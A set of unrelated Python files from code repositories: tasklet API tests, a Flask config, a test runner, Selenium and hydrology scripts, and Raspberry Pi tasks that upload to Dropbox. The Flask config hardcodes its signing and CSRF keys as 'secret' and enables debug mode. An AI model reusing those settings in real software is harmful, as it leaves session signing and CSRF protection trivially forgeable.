_run_execution(tasklet_server, tasklet, build, label, sample_input)\n\n execution2_rv = requests.post(\n f\"{tasklet_server.api}/executions\",\n data=json.dumps({\n \"namespace\": namespace.name,\n \"tasklet\": tasklet.Name,\n \"label\": label.Name,\n \"input\": {\n \"serialized_data\": base64.b64encode(sample_input.SerializeToString()).decode(),\n }\n }),\n )\n test_utils.ensure_response_status(execution2_rv)\n\n execution2_json = execution2_rv.json()[\"execution\"]\n assert execution2_json[\"meta\"][\"build_id\"] == build.ID\n assert execution2_json[\"meta\"][\"tasklet_id\"] == tasklet.ID\n assert execution2_json[\"status\"][\"status\"] == \"E_EXECUTION_STATUS_EXECUTING\"\n\n # GET execution\n rv = requests.get(\n f\"{tasklet_server.api}/executions:getById\", params={\"id\": execution_json['meta']['id']},\n )\n test_utils.ensure_response_status(rv)\n assert _format_execution_json(rv.json()[\"execution\"]) == _format_execution_json(execution_json)\n\n for url, searchQuery in (\n (f\"{tasklet_server.api}/executions:listByTasklet\", {\"namespace\": namespace.name, \"tasklet\": tasklet.Name}),\n (f\"{tasklet_server.api}/executions:listByBuild\", {\"build_id\": build.ID}),\n ):\n rv = requests.get(url, params=searchQuery)\n test_utils.ensure_response_status(rv)\n\n execution_ids = set(x[\"meta\"][\"id\"] for x in rv.json()[\"executions\"])\n assert execution_ids == {execution_json[\"meta\"][\"id\"], execution2_json[\"meta\"][\"id\"]}\n assert all(x[\"meta\"][\"tasklet_id\"] == tasklet.ID for x in rv.json()[\"executions\"])\n assert all(x[\"meta\"][\"build_id\"] == build.ID for x in rv.json()[\"executions\"])\n\n next_page_query = copy.deepcopy(searchQuery)\n next_page_query.update({\"token\": rv.json()[\"token\"]})\n rv = requests.get(url, params=next_page_query)\n test_utils.ensure_response_status(rv)\n assert len(rv.json().get(\"executions\", [])) == 0\n\n\ndef test_executions_idempotent_create(tasklet_server: server_mock.TaskletServer, registered_schema: str):\n namespace = tasklet_server.create_ns(\"default\")\n tasklet = tasklet_server.create_tasklet(namespace, \"TLFoo\", {\"catalog\": \"/home/alximik\"})\n build = tasklet_server.create_build(tasklet, registered_schema, None)\n label = tasklet_server.create_label(tasklet, \"latest\", build, {})\n\n sample_input = well_known_structures_pb2.GenericBinary(\n payload=b\"foo-bar-baz\",\n )\n reqId = str(uuid.uuid4())\n rv = requests.post(\n f\"{tasklet_server.api}/executions\",\n headers={\n \"X-Request-ID\": reqId,\n },\n json={\n \"namespace\": tasklet.NS,\n \"tasklet\": tasklet.Name,\n \"label\": label.Name,\n \"input\": {\n \"serialized_data\": base64.b64encode(sample_input.SerializeToString()).decode()\n }\n }\n )\n test_utils.ensure_response_status(rv)\n execution_one = rv.json()[\"execution\"]\n rv = requests.post(\n f\"{tasklet_server.api}/executions\",\n headers={\n \"X-Request-ID\": reqId,\n },\n json={\n \"namespace\": tasklet.NS,\n \"tasklet\": tasklet.Name,\n \"label\": label.Name,\n \"input\": {\n \"serialized_data\": base64.b64encode(sample_input.SerializeToString()).decode()\n }\n }\n )\n test_utils.ensure_response_status(rv)\n execution_two = rv.json()[\"execution\"]\n assert execution_one[\"meta\"][\"id\"] == execution_two[\"meta\"][\"id\"]\n assert execution_one == execution_two\n\n\ndef test_executions_abort(tasklet_server: server_mock.TaskletServer, registered_schema: str):\n namespace = tasklet_server.create_ns(\"default\")\n tasklet = tasklet_server.create_tasklet(namespace, \"TLFoo\", {\"catalog\": \"/home/alximik\"})\n build = tasklet_server.create_build(tasklet, registered_schema, None)\n label = tasklet_server.create_label(tasklet, \"latest\", build, {})\n\n sample_input = well_known_structures_pb2.GenericBinary(\n payload=b\"foo-bar-baz\",\n )\n execution_id = tasklet_server.create_execution(tasklet, label, sample_input)\n\n rv = requests.post(\n f\"{tasklet_server.api}/executions:abort\",\n json={\n \"id\": execution_id,\n \"reason\": \"ya peredumal!!!!\",\n }\n )\n test_utils.ensure_response_status(rv)\n\n rv = requests.post(\n f\"{tasklet_server.api}/executions:abort\",\n json={\n \"id\": execution_id,\n \"reason\": \"ostanovites!1111!!\",\n }\n )\n test_utils.ensure_response_status(rv, http.client.BAD_REQUEST)\n assert \"already aborted\" in rv.text\n\n rv = requests.get(\n f\"{tasklet_server.api}/executions:getById\", params={\"id\": execution_id},\n )\n test_utils.ensure_response_status(rv)\n assert rv.json()[\"execution\"][\"status\"][\"abort_request\"][\"author\"] == \"fake_default_user\"\n assert rv.json()[\"execution\"][\"status\"][\"abort_request\"][\"reason\"] == \"ya peredumal!!!!\"\n\n\ndef test_executions_abort_acl(tasklet_server: server_mock.TaskletServer, registered_schema: str):\n namespace = tasklet_server.create_ns(\"default\")\n tasklet = tasklet_server.create_tasklet(namespace, \"TLFoo\", {\"catalog\": \"/home/alximik\"})\n build = tasklet_server.create_build(tasklet, registered_schema, None)\n label = tasklet_server.create_label(tasklet, \"latest\", build, {})\n\n sample_input = well_known_structures_pb2.GenericBinary(\n payload=b\"foo-bar-baz\",\n )\n execution_id = tasklet_server.create_execution(tasklet, label, sample_input)\n rv = requests.post(\n f\"{tasklet_server.api}/executions:abort\",\n headers={\"Grpc-Metadata-X-Test-User\": \"user_unknown\"},\n json={\n \"id\": execution_id,\n \"reason\": \"ya peredumal!!!!\",\n }\n )\n test_utils.ensure_response_status(rv, http.client.FORBIDDEN)\n\n rv = requests.get(\n f\"{tasklet_server.api}/executions:getById\", params={\"id\": execution_id},\n )\n test_utils.ensure_response_status(rv)\n assert rv.json()[\"execution\"][\"status\"].get(\"abort_request\", None) is None\n\n\ndef _gen_test_data_bundle(\n tasklet_server: server_mock.TaskletServer,\n registered_schema: str,\n) -> (\n data_model_pb2.NamespaceMeta,\n test_models.Tasklet,\n test_models.Build,\n test_models.Label,\n fake_ya_make_pb2.FakeYaMakeInput,\n):\n namespace = tasklet_server.create_ns(\"default\")\n tasklet = tasklet_server.create_tasklet(namespace, \"TLFoo\", {\"catalog\": \"/home/alximik\"})\n build = tasklet_server.create_build(tasklet, None, {\n \"schema\": {\n \"simple_proto\": {\n \"schema_hash\": registered_schema,\n \"input_message\": \"tasklet_examples.FakeYaMakeInput\",\n \"output_message\": \"tasklet_examples.FakeYaMakeOutput\",\n },\n },\n })\n label = tasklet_server.create_label(tasklet, \"latest\", build, {})\n\n typed_input = fake_ya_make_pb2.FakeYaMakeInput(\n branch=\"junk-branch\",\n revision=\"junk-revision\",\n arc_token=well_known_structures_pb2.SecretRef(\n id=\"sec1-XXXX\",\n version=\"ver1-YYY\",\n key=\"my_arc_token\"\n )\n )\n return namespace, tasklet, build, label, typed_input\n\n\ndef test_third_party_input_in_execution_grpc(tasklet_server: server_mock.TaskletServer, registered_schema: str):\n namespace, tasklet, build, label, typed_input = _gen_test_data_bundle(tasklet_server, registered_schema)\n\n grpc_stub = tasklet_server.grpc_stub\n req = tasklet_service_pb2.ExecuteRequest(\n namespace=namespace.name,\n tasklet=tasklet.Name,\n label=label.Name,\n input=data_model_pb2.ExecutionInput(\n serialized_data=typed_input.SerializeToString(),\n )\n )\n\n resp: tasklet_service_pb2.ExecuteResponse = grpc_stub.Execute(req)\n execution_id = resp.execution.meta.id\n\n get_req = tasklet_service_pb2.GetExecutionRequest(id=execution_id)\n get_resp: tasklet_service_pb2.GetExecutionResponse = grpc_stub.GetExecution(get_req)\n\n assert _execution_to_json(resp.execution) == _execution_to_json(get_resp.execution)\n\n\ndef test_third_party_input_in_execution_json(tasklet_server: server_mock.TaskletServer, registered_schema: str):\n namespace, tasklet, build, label, typed_input = _gen_test_data_bundle(tasklet_server, registered_schema)\n execution_json = _run_execution(tasklet_server, tasklet, build, label, typed_input)\n\n # GET execution\n rv = requests.get(\n f\"{tasklet_server.api}/executions:getById\", params={\"id\": execution_json['meta']['id']},\n )\n test_utils.ensure_response_status(rv)\n execution_json[\"status\"].setdefault(\"result\", {})\n assert _format_execution_json(rv.json()[\"execution\"]) == _format_execution_json(execution_json)\n\n\ndef test_list_executions_pagination(tasklet_server: server_mock.TaskletServer, registered_schema: str):\n namespaces = [tasklet_server.create_ns(f\"ns{x}\") for x in range(2)]\n tasklet_to_builds: dict[test_models.Tasklet, typing.List[test_models.Build]] = {}\n build_to_labels: dict[test_models.Build, test_models.Label] = {}\n\n for ns in namespaces:\n ns_tasklets = [tasklet_server.create_tasklet(ns, f\"TL_t{x}\", {}) for x in range(2)]\n for tl in ns_tasklets:\n builds = [tasklet_server.create_build(tl, registered_schema, None) for _ in range(2)]\n for build in builds:\n assert build not in build_to_labels\n build_to_labels[build] = tasklet_server.create_label(tl, f\"build-{build.ID[-5:]}\", build, {})\n assert tl not in tasklet_to_builds\n tasklet_to_builds[tl] = builds\n\n execution_to_parents: typing.Dict[str, typing.Tuple[test_models.Tasklet, test_models.Build]] = {}\n build_to_executions: typing.Dict[test_models.Build, typing.Set[str]] = {}\n step = 0\n total_execution_count = 0\n\n input_message = well_known_structures_pb2.GenericBinary(payload=b\"foo-bar-baz\")\n\n def spawn_executions(count, tl_: test_models.Tasklet, build_: test_models.Build):\n for _ in range(count):\n execution_id = tasklet_server.create_execution(\n tl_,\n build_to_labels[build_],\n input_message,\n )\n assert execution_id not in execution_to_parents\n execution_to_parents[execution_id] = (tl_, build_)\n assert execution_id not in build_to_executions[build_]\n build_to_executions[build_].add(execution_id)\n\n for tl, builds in tasklet_to_builds.items():\n for build in builds:\n assert build not in build_to_executions\n build_to_executions[build] = set()\n total_execution_count += 10 + step\n assert total_execution_count < 1000\n spawn_executions(10 + step, tl, build)\n\n # List executions by build\n for tl, builds in tasklet_to_builds.items():\n for build in builds:\n this_build_executions = set()\n token = None\n while True:\n rv = requests.get(\n f\"{tasklet_server.api}/executions:listByBuild\",\n params={\"token\": token, \"build_id\": build.ID}\n )\n test_utils.ensure_response_status(rv)\n token = rv.json()[\"token\"]\n if not rv.json().get(\"executions\", []):\n break\n for execution in rv.json()[\"executions\"]:\n assert execution[\"meta\"][\"tasklet_id\"] == build.TaskletID\n assert execution[\"meta\"][\"build_id\"] == build.ID\n assert execution[\"meta\"][\"id\"] not in this_build_executions\n this_build_executions.add(execution[\"meta\"][\"id\"])\n\n assert this_build_executions == build_to_executions[build]\n\n # List executions by build\n for tl, builds in tasklet_to_builds.items():\n this_tasklet_executions = set()\n token = None\n while True:\n rv = requests.get(\n f\"{tasklet_server.api}/executions:listByTasklet\",\n params={\n \"namespace\": tl.NS,\n \"tasklet\": tl.Name,\n \"token\": token,\n },\n )\n test_utils.ensure_response_status(rv)\n token = rv.json()[\"token\"]\n if not rv.json().get(\"executions\", []):\n break\n for execution in rv.json()[\"executions\"]:\n assert execution[\"meta\"][\"tasklet_id\"] == tl.ID\n assert execution[\"meta\"][\"tasklet_id\"] == execution_to_parents[execution[\"meta\"][\"id\"]][0].ID\n assert execution[\"meta\"][\"build_id\"] == execution_to_parents[execution[\"meta\"][\"id\"]][1].ID\n assert execution[\"meta\"][\"id\"] not in this_tasklet_executions\n this_tasklet_executions.add(execution[\"meta\"][\"id\"])\n\n assert this_tasklet_executions == \\\n set(execution_id for execution_id, parents in execution_to_parents.items() if tl == parents[0])\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Tasklet/experimental/tests/test_executions.py","file_name":"test_executions.py","file_ext":"py","file_size_in_byte":15465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12585523501","text":"import os\n\n\n# Statement for enabling the development environment\nDEBUG = True\nASSETS_DEBUG = True\n\n# Define the application directory\nBASE_DIR = os.path.abspath(os.path.dirname(__file__))\n\n# Define the database - we are working with\n# SQLite for this example\nSQLALCHEMY_DATABASE_URI = 'sqlite:///./app.db'\nSQLALCHEMY_TRACK_MODIFICATIONS = False\nDATABASE_CONNECT_OPTIONS = {}\n\n# Enable protection against *Cross-site Request Forgery (CSRF)*\nCSRF_ENABLED = True\n\n# Use a secure, unique and absolutely secret key for\n# signing the data.\nCSRF_SESSION_KEY = \"secret\"\n\n# Secret key for signing cookies\nSECRET_KEY = \"secret\"\n","repo_name":"THSUPRM/ths-client","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41421371156","text":"import os\nimport sys\nimport re\nimport glob\nimport unittest\n\ntest_basedir = 'test'\ntest_subdirs = ['sbml','xml','math','annotation']\ntest_files = \"/Test*.py\"\n\ndef suite():\n suite = unittest.TestSuite()\n cwd = os.getcwd() \n sys.path.append(cwd)\n os.chdir(test_basedir + '/..')\n for subdir in test_subdirs :\n sys.path.append(test_basedir + '/' + subdir)\n for file in glob.glob( test_basedir + '/' + subdir + '/' + test_files ) :\n module_name = re.compile(r\"\\.py$\").sub('',os.path.basename(file)) \n module = __import__(module_name)\n class_name = getattr(module, module_name)\n suite.addTest(unittest.makeSuite(class_name))\n return suite\n\nif __name__ == \"__main__\":\n if len(sys.argv) > 1: \n # parse additional command line arguments\n for index in range(1, len(sys.argv)):\n current = sys.argv[index]\n hasNext = (index + 1) < len(sys.argv)\n nextIndex = (index + 1);\n if current == \"-b\" and hasNext:\n # allow to set the base path\n test_basedir = sys.argv[nextIndex];\n index = nextIndex\n elif current == \"-p\" and hasNext:\n # add directory to path\n sys.path.append(sys.argv[nextIndex])\n index = nextIndex\n elif current == \"-a\" and hasNext:\n # allow to test additional directories\n test_subdirs = test_subdirs + sys.argv[nextIndex:]\n break;\n if unittest.TextTestRunner(verbosity=1).run(suite()).wasSuccessful() :\n sys.exit(0)\n else:\n sys.exit(1)\n\n","repo_name":"sbmlteam/libsbml","sub_path":"src/bindings/python/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1485,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"3"} +{"seq_id":"3229307906","text":"# -*- coding: utf-8 -*-\n# VÍDEO - 4/45 Selenium with Python Tutorial 4-WebDriver Navigational Commands\n'''\nAGENDA\nNavigation commands\n'''\n\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nimport time\n\ndriver = webdriver.Firefox()\n\ndriver.get(\"http://newtours.demoaut.com/\")\n\nprint(driver.title)\n\ndriver.get(\"http://pavantestingtools.blogspot.in/\")\n\ntime.sleep(5)\n\nprint(driver.title)\n\n#retorna para uma página anterior\ndriver.back()\n\nprint(driver.title)\n\n#retorna para uma página posterior\ndriver.forward()\n\nprint(driver.title)\n\ndriver.close()","repo_name":"leandroaa7/selenium","sub_path":"sdet-selenium-with-python/navigationcommands.py","file_name":"navigationcommands.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34148910513","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '0.1'\n\nsetup(name='curtocircuito',\n version=version,\n description=\"Social network for sharing eletronic circuit\",\n long_description=open(\"README.txt\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read(),\n # Get more strings from http://www.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n \"Programming Language :: Python\",\n \"Topic :: Software Development :: Libraries :: Python Modules\",\n ],\n keywords='',\n author='Luciano Pacheco',\n author_email='lucmult@gmail.com',\n url='http://github.com/lucmult/curtocircuito',\n license='GPL',\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=[],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n # -*- Extra requirements: -*-\n ],\n entry_points=\"\"\"\n # -*- Entry points: -*-\n \"\"\",\n )\n","repo_name":"lucmult/cc-buildout","sub_path":"src/curtocircuito/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"18332530961","text":"import sys\nimport math\nfrom collections import deque\n\nsys.setrecursionlimit(1000000)\nMOD = 10 ** 9 + 7\ninput = lambda: sys.stdin.readline().strip()\nNI = lambda: int(input())\nNMI = lambda: map(int, input().split())\nNLI = lambda: list(NMI())\nSI = lambda: input()\n\n\ndef make_grid(h, w, num): return [[int(num)] * w for _ in range(h)]\n\n\ndef main():\n N = NI()\n edges = [[i]+NLI() for i in range(N-1)]\n C = NLI()\n tree = [[] for _ in range(N+1)]\n for edge in edges:\n tree[edge[1]].append(edge[2])\n tree[edge[2]].append(edge[1])\n option_nums = []\n for i, node in enumerate(tree):\n option = len(node)\n option_nums.append([option, i])\n option_nums = sorted(option_nums)\n C = sorted(C)\n ans = {}\n for op, c in zip(option_nums[1:], C):\n ans[op[1]] = c\n A = 0\n for edge in edges:\n x, y = edge[1], edge[2]\n A += min(ans[x], ans[y])\n print(A)\n for i in range(1, N+1):\n if i == N:\n print(str(ans[i]))\n continue\n print(str(ans[i]), end=\" \")\n\nif __name__ == \"__main__\":\n main()","repo_name":"Mao-beta/AtCoder","sub_path":"M-SOLUTIONS2019D.py","file_name":"M-SOLUTIONS2019D.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31461097480","text":"#!/usr/bin/python\nfrom __future__ import absolute_import\nfrom celery import app, Celery\nfrom .models import dropbox_space_limit_event, dropbox_motion_video_event\nfrom .models import new_motion_detected_event, remove_motion_video_url\nfrom .models import dropbox_upload_error_event\nfrom django.conf import settings\nimport os\nimport subprocess\n\napp = Celery('celerytasks', broker='amqp://guest:guest@localhost:5672//')\n\nDROPBOX_FREE_THRESH_MB = 100\nCAPACITY_THRESH_MB = 10\nMB_IN_BYTES = 1048576.0\n\ndropbox_videos = \"/videos\"\ndropbox_images = \"/images\"\n\ndef is_motion_dir_full(motion_path):\n os.chdir(motion_path)\n curr_size = sum(os.path.getsize(f) for f in os.listdir('.')\n if os.path.isfile(f))\n curr_size_mb = curr_size / MB_IN_BYTES\n return (curr_size_mb > CAPACITY_THRESH_MB)\n\n@app.task\ndef alert_if_dropbox_full():\n # get dropbox account info\n proc = subprocess.Popen([settings.DROPBOX_UPLOADER,'info'],\n stdout=subprocess.PIPE)\n output_lines = proc.stdout.read().split('\\n')\n data = dict()\n for pair in (x.split(':\\t') for x in output_lines if ':\\t' in x):\n data[pair[0]] = pair[1]\n\n # check free space\n free_space = int(data['Free'].split()[0])\n if free_space < DROPBOX_FREE_THRESH_MB:\n # write warning event to web app\n dropbox_space_limit_event(free_space)\n return free_space\n\n@app.task\ndef upload_motion_to_dropbox():\n motion_path = settings.MOTION_TARGET_DIR\n\n if not is_motion_dir_full(motion_path):\n pass\n\n video_files = os.path.join(motion_path, \"*.avi\")\n image_files = os.path.join(motion_path, \"*.jpg\")\n\n # upload videos to dropbox\n proc = subprocess.Popen([settings.DROPBOX_UPLOADER, 'upload'] +\n filter(\n lambda f:f.endswith('avi'),\n os.listdir(motion_path)) +\n [dropbox_videos],\n stdout=subprocess.PIPE)\n # get new remote videos and add events to web app\n # assuming output line format: > Uploading \"local_path\" to \"remote_path\"... DONE\n files = proc.stdout.read().split('\\n')\n for item in (f.split('\"') for f in files if 'DONE' in f):\n remote_file = item[3]\n proc = subprocess.Popen([settings.DROPBOX_UPLOADER, 'share',\n remote_file], stdout=subprocess.PIPE)\n # assuming output format: > Share link: https://db.tt/a9xJoX9X\n shared_url = proc.stdout.read().split()[3]\n # create event for new motion video\n dropbox_motion_video_event(shared_url)\n\n # delete videos from Rpi\n os.system(\"rm -f \" + os.path.join(motion_path, \"*.avi\"))\n\n # upload images to dropbox and delete from Rpi\n #os.system(settings.DROPBOX_UPLOADER + \" upload \" + image_files + \" \" + dropbox_images)\n #os.system(\"rm -f \" + os.path.join(motion_path, \"*.jpg\"))\n\n alert_if_dropbox_full()\n\n@app.task\ndef new_motion_detected(filepath):\n if not os.path.isfile(filepath):\n return\n\n # Add event to let web app users know motion was detected\n event_id = new_motion_detected_event(os.path.basename(filepath))\n\n # Upload motion video to Dropbox\n proc = subprocess.Popen([settings.DROPBOX_UPLOADER, 'upload',\n filepath, dropbox_videos],\n stdout=subprocess.PIPE)\n\n # Get remote video URL and add event to web app,\n # assuming output line format: > Uploading \"local_path\" to \"remote_path\"... DONE\n output = proc.stdout.read()\n if 'DONE' not in output:\n # There was an error while uploading the video to Dropbox, abort.\n dropbox_upload_error_event()\n return\n remote_file = output.split('\"')[3]\n proc = subprocess.Popen([settings.DROPBOX_UPLOADER, 'share', remote_file],\n stdout=subprocess.PIPE)\n # assuming output format: > Share link: https://db.tt/a9xJoX9X\n shared_url = proc.stdout.read().split()[3]\n\n # Create event for new motion video\n dropbox_motion_video_event(shared_url)\n\n # Remove option to download local video because it's about to be deleted\n remove_motion_video_url(event_id)\n\n # delete video from motion data directory\n os.remove(filepath)\n","repo_name":"amito/rpi-surv-cam","sub_path":"rpisurvcam/events/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":4252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71699743761","text":"import web_utils.connection as connection\nfrom rpc.servers_list import OPERATION_SERVERS\nimport json\n\nNAME_SERVER_STD_IP = \"127.0.0.1\"\nNAME_SERVER_STD_PORT = 15000\n\nNAME_SERVER_STD_ADDR = (NAME_SERVER_STD_IP, NAME_SERVER_STD_PORT)\n\nclass NameServer:\n def __init__(self, ip: str = NAME_SERVER_STD_IP, port: int = NAME_SERVER_STD_PORT):\n \"\"\"\n Inicializa um servidor de nomes com o ip e o número da porta.\n\n :param port: Número da porta do servidor.\n \"\"\"\n self.ip = ip\n self.port = port\n self.server_socket = None\n self.operation_servers = OPERATION_SERVERS\n\n def __del__(self):\n \"\"\"\n Fecha o socket do servidor ao destruir o objeto.\n \"\"\"\n if self.server_socket: \n self.server_socket.close()\n\n\n def start(self) -> None:\n \"\"\"\n Inicia o servidor de nomes e espera por conexões de clientes.\n \"\"\"\n self.server_socket = connection.create_server_connection(self.ip, self.port, False)\n print(f\"O servidor de nomes está ouvindo na porta {self.port}...\")\n \n try:\n while True:\n operation, address = connection.receive_udp_socket_message(self.server_socket)\n print(address)\n server_list = [server for server, operations in self.operation_servers.items() if operation.decode() in operations]\n connection.send_udp_socket_message(self.server_socket, json.dumps(server_list), address)\n except KeyboardInterrupt:\n print(\"\\nO servidor foi finalizado...\")\n finally:\n self.server_socket.close()\n\n\n def close(self) -> None:\n \"\"\"\n Fecha o socket do servidor ao fechar o objeto.\n \"\"\"\n if self.server_socket: \n self.server_socket.close()","repo_name":"ViniciusJPSilva/TSI-RemoteProcedureCall","sub_path":"rpc/name_server.py","file_name":"name_server.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"36301117640","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 24 16:50:07 2020\n\n@author: ntr002\n\"\"\"\nimport numpy as np\nimport pandas as pd\nimport xarray as xr\nimport os\nfrom . import GIS_functions as gis\n\ndef open_nc(input_nc, chunksize=None, layer=None):\n if chunksize is None:\n dts=xr.open_dataset(input_nc)\n else:\n dts=xr.open_dataset(input_nc,\n chunks={'time':chunksize[0],\n 'longitude':chunksize[1],\n 'latitude':chunksize[2]})\n if type(layer) is int: #select dataarray by index\n layer_name=list(dts.keys())[layer]\n return dts[layer_name]\n elif type(layer) is str: #select dataarray by name\n return dts[layer]\n else:\n return dts\n \ndef create_yearly_dataset(monthly_nc, output=None, \n hydroyear='A-DEC',chunksize=None):\n '''\n create yearly dataset from monthly dataset\n monthly_nc: str \n path to monthly NetCDF file\n output: str \n path to output yearly NetCDF file\n hydroyear: str \n End month of hydrological year. default is 'A-DEC' for December\n chunksize: list of 3 int\n time chunk, x and y chunks\n default is None mean not using chunks\n '''\n #check output path\n if output is None:\n if monthly_nc[-10:] == 'monthly.nc':\n output=monthly_nc.replace('monthly.nc','yearly.nc')\n else:\n output=monthly_nc.replace('.nc','_yearly.nc')\n else:\n if not os.path.exists(os.path.dirname(output)):\n os.makedirs(os.path.dirname(output))\n #open monthly nc\n dts=open_nc(monthly_nc, chunksize=chunksize)\n #resample to hydrological years\n dts_y=dts.resample(time=hydroyear).sum(dim=['time'],skipna=False)\n dts_y.to_netcdf(output)\n \n #close netcdf file\n dts.close()\n dts_y.close()\n \n return output\n\ndef resample_to_monthly_dataset(yearly_nc, sample_nc,\n start_month=0,\n output=None,\n chunksize=None):\n '''\n yearly_nc: a yearly dataset to resample to monthly\n sample_nc: a monthly dataset to sample 'time' dimension\n start_month: the index of start month. \n default start_month = 0 means yearly value resample from the first\n month in sample_nc\n \n Resample a yearly netCDF dataset to monthly netCDF dataset\n Where the value of each month is the same with the value of the year\n '''\n dts1=open_nc(yearly_nc,chunksize=chunksize,layer=0)\n dts2=open_nc(sample_nc,chunksize=chunksize,layer=0) \n \n for i in range(len(dts1.time)):\n for t in range(i*12-start_month,i*12+12-start_month):\n LU=dts1.isel(time=i)\n if t==0:\n dts=LU\n else:\n dts = xr.concat([dts, LU], dim='time') \n dts['time']=dts2['time']\n #change coordinates order to [time,latitude,longitude]\n dts=dts.transpose('time','latitude','longitude') \n\n dts.attrs=dts1.attrs\n dts.name = dts1.name\n \n comp = dict(zlib=True, \n complevel=9, \n least_significant_digit=2, \n chunksizes=chunksize)\n if output is None:\n output=yearly_nc.replace('.nc','_resampled_monthly.nc')\n encoding = {dts.name: comp}\n dts.load().to_netcdf(output,encoding=encoding)\n dts1.close()\n dts2.close()\n print('Save monthly LU datacube as {0}'.format(output))\n return output\n\ndef calc_flux_per_basin(dts_nc, basin_mask, \n chunksize=None,output=None,quantity='volume'):\n '''\n calculate flux per basin/sub-basin\n input_nc: str\n path to dataset (NetCDF) (in mm)\n basin_mask: str OR np.array/xr.DataArray\n str \n path to basin mask (GeoTIFF)\n np.array/xr.DataArray \n pixel area of basin (in km2)\n or mask of basin\n quantity: str\n 'volume' OR 'depth'\n \n output: str\n path to output (csv)\n default is None \n \n return\n dataframe (in TCM)\n '''\n dts=open_nc(dts_nc,chunksize=chunksize)\n #read area mask\n if type(basin_mask) is str:\n basin=gis.OpenAsArray(basin_mask,nan_values=True)\n area_map=gis.MapPixelAreakm(basin_mask)\n area_mask=area_map*basin\n else: #basin_mask is 2D array\n area_mask=basin_mask\n #calculate flux \n if quantity=='volume':\n dts_m=dts*area_mask #flux = depth*area \n df=dts_m.sum(dim=['latitude','longitude']).to_dataframe() #export data\n elif quantity=='depth':\n dts_m=dts*basin_mask\n df=dts_m.mean(dim=['latitude','longitude']).to_dataframe() #export data\n if output is not None:\n df.to_csv(output,sep=';') #save data as csv\n print('Save basin flux as {0}'.format(output))\n dts.close()\n return df\n\n\ndef calc_flux_per_LU_class(dts_nc, lu_nc, basin_mask,\n chunksize=None, \n output=None, \n lu_dictionary=None, \n quantity='volume'):\n '''\n calculate flux per LU class in WA+ LU map\n \n input_nc: str\n path to yearly dataset (NetCDF) (in mm)\n lu_nc: str\n path to NetCDF of LULC map\n \n basin_mask: str OR np.array/xr.DataArray\n str \n path to basin mask (GeoTIFF)\n np.array/xr.DataArray \n pixel area of basin (in km2)\n chunksize: list\n [t,x,y] chunksize of datacube\n output: str\n path to output (csv)\n default is None \n quantity: str\n 'volume': multiplied with pixel area (km2). \n if variable unit is mm, \n the result will be in 10^3 m3 or 10^-6 km3\n if the variable unit is kg/ha,\n the result will be in 10^2 kg\n 'depth': keep the variable unit\n \n return\n dataframe (in TCM)\n '''\n dts=open_nc(dts_nc,chunksize=chunksize)\n lu=open_nc(lu_nc,chunksize=chunksize,layer=0)\n \n #read basin mask\n if type(basin_mask) is str:\n basin=gis.OpenAsArray(basin_mask,nan_values=True)\n \n if quantity=='volume':\n #get area mask\n if type(basin_mask) is str:\n area_map=gis.MapPixelAreakm(basin_mask)\n area_mask=area_map*basin\n else:\n area_mask=basin_mask \n dts_m=dts*area_mask #flux = depth*area\n method='sum'\n \n elif quantity=='depth':\n dts_m=dts*basin\n method='mean'\n \n# n_lu=len(lu.time) #number of landuse map\n \n# if n_lu==1: #single landuse map\n# LU=lu[0] #get single landuse map \n \n if lu_dictionary is None:\n df=aggregate_by_lu_unique(dts_m,lu,how=method)\n elif type(lu_dictionary) is dict:\n df=aggregate_by_lu_dictionary(dts_m,lu,lu_dictionary,\n how=method)\n \n if output is not None: #export result if output path is defined\n df.to_csv(output,sep=';')\n print('Save LU flux as {0}'.format(output))\n lu.close()\n dts.close()\n return df\n\ndef aggregate_by_lu_unique(dts,LU,how='sum'):\n '''aggregate dataset by unique LU classes in LU map(s)\n '''\n unique_LU=np.unique(LU) #get unique landuse classes\n unique_LU=unique_LU[~np.isnan(unique_LU)] #exclude nan\n data=[] #create empty data list\n \n LU=dts*0+LU #Trick: to keep same time dimension\n dts=LU*0+dts #Trick: to keep same time dimension\n for lucl in unique_LU: #agrregate total fluxes per each lu class\n dts_lu=xr.where(LU==lucl,dts,np.nan) #mask only lu class\n if how=='sum':\n df_lu=dts_lu.sum(dim=[\n 'latitude',\n 'longitude'\n ]).to_dataframe() #sum of all pixels in lu class\n elif how=='mean':\n df_lu=dts_lu.mean(dim=[\n 'latitude',\n 'longitude'\n ]).to_dataframe() #mean of all pixels in lu class \n if len(df_lu.columns)>1: \n df_lu.columns=['{0}-{1}'.format(lucl,\n col) for col in df_lu.columns] #rename column with variable \n else:\n df_lu.columns=['{0}'.format(lucl) for col in df_lu.columns] #rename column \n data.append(df_lu) #append data list by lu class\n df=pd.concat(data, axis=1) #merge all results into 1 dataframe\n return df\n\ndef aggregate_by_lu_dictionary(dts,LU,lu_dictionary,how='sum'):\n '''aggregate dataset by LU classes categories \n '''\n data=[] #create empty data list\n LU=dts*0+LU #Trick: to keep same time dimension\n dts=LU*0+dts 